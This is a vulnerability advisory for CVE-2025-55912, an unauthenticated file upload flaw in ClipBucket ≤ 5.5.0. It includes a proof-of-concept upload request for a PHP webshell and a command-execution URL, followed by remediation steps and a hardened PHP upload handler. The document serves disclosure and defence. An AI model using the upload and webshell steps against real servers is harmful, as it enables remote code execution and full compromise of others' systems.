Summary
ClipBucket versions ≤ 5.5.0 include an unauthenticated arbitrary file upload vulnerability in upload/actions/photo_uploader.php. The upload endpoint permits file uploads without proper authentication or sufficient validation, enabling an attacker to upload a PHP webshell and achieve remote code execution (RCE).
Details
The photo_uploader.php endpoint (plupload handler) does not enforce authentication or properly validate uploaded file types and content. File extension checks and MIME checks can be bypassed, allowing an attacker to submit a malicious PHP payload (for example shell.php) that is stored in a web-accessible directory and then executed by requesting the uploaded file.
Relevant code (example path):
https://github.com/MacWarrior/clipbucket-v5/blob/5.5.0/upload/actions/photo_uploader.php (ClipBucket 5.5.0)
PoC
No authentication required.
Example multipart POST to upload a PHP webshell:
POST /upload/actions/photo_uploader.php HTTP/1.1
Host: victim.example.com
Content-Type: multipart/form-data; boundary=----BOUNDARY
------BOUNDARY
Content-Disposition: form-data; name="Filedata"; filename="shell.php"
Content-Type: application/x-php
------BOUNDARY--
If the upload succeeds and the file is stored under http://victim.example.com/files/photos/shell.php, the attacker can execute commands:
http://victim.example.com/files/photos/shell.php?cmd=id
Expected response: output of id, showing RCE.
Notes:
The exact stored path may vary (e.g., /files/photos/); inspect upload behavior or successful upload response to find the URL.
Naive extension checks can be bypassed by tampering with the multipart filename or Content-Type headers, or by using double extensions where the server honours them; the exact bypass used is deliberately not disclosed here for obvious security reasons.
Impact
Vulnerability type: Unauthenticated Arbitrary File Upload (CWE-434) → Remote Code Execution.
Affected versions: ClipBucket ≤ 5.5.0 (confirmed).
Impact: Full server compromise (RCE) via unauthenticated upload and execution of PHP code. High severity.
Remediation
Require authentication and authorization on upload endpoints. Do not allow unauthenticated uploads.
Enforce strict server-side validation: allow a safe list of file types/extensions, verify file contents (magic bytes), and reject suspicious uploads.
Store uploaded files outside the web root or ensure uploaded files are served through a proxy or with sanitized filenames and denied execution permissions (e.g., store outside public_html or set chmod to disallow execution).
If PHP must be stored in web root, ensure the server does not execute user-uploaded files (use separate storage or content-disposition handling).
Add server-side scanning (AV, mime checks) and limit accepted size/types.
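The remediation points above, combined into one hardened handler as an added example (not ClipBucket's own code). The $_SESSION['user_id'] check, the UPLOAD_STORAGE_DIR path and the "Filedata" field name are assumptions; the storage directory is assumed to sit outside the web root.

```php
<?php
// Added example, not ClipBucket's own code: a hardened photo-upload handler that
// applies the remediation points above. The $_SESSION['user_id'] check, the
// UPLOAD_STORAGE_DIR path and the "Filedata" field name are assumptions.
session_start();

const UPLOAD_STORAGE_DIR = '/var/lib/clipbucket-uploads/photos'; // outside web root (assumed)
const MAX_UPLOAD_BYTES   = 10 * 1024 * 1024;
// Allow-listed extensions and the MIME type finfo must detect from the bytes.
const ALLOWED_IMAGES = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];

function fail(int $status, string $msg): void {
    http_response_code($status);
    header('Content-Type: application/json');
    echo json_encode(['error' => $msg]);
    exit;
}

// 1. Authentication: the vulnerable handler enforced none.
if (empty($_SESSION['user_id'])) {
    fail(401, 'authentication required');
}
// 2. Only accept a genuine PHP-managed upload of bounded size.
$file = $_FILES['Filedata'] ?? null;
if (!$file || $file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
    fail(400, 'no valid upload');
}
if ($file['size'] > MAX_UPLOAD_BYTES) {
    fail(413, 'file too large');
}
// 3. Extension allow-list on the client-supplied name (trusted for nothing else).
$ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
if (!isset(ALLOWED_IMAGES[$ext])) {
    fail(415, 'file type not allowed');
}
// 4. Content check by magic bytes; the client's Content-Type header is never consulted.
$detected = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
if ($detected !== ALLOWED_IMAGES[$ext] || getimagesize($file['tmp_name']) === false) {
    fail(415, 'content does not match a supported image type');
}
// 5. Server-generated name, stored outside the web root, not executable.
$dest = UPLOAD_STORAGE_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
if (!move_uploaded_file($file['tmp_name'], $dest)) {
    fail(500, 'storage failure');
}
chmod($dest, 0640);
header('Content-Type: application/json');
echo json_encode(['stored' => basename($dest)]);
```

Because the stored file lives outside the document root and its name is server-generated, a later request cannot reach it as a script; serve it through a read-only download endpoint that sets an image Content-Type.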
References:
https://github.com/MacWarrior/clipbucket-v5/tree/5.5.0
CVE: CVE-2025-55912
Credit: Discovered and reported by Mukundsinh Solanki (r00td3str0y3r) — https://x.com/r00td3str0y3r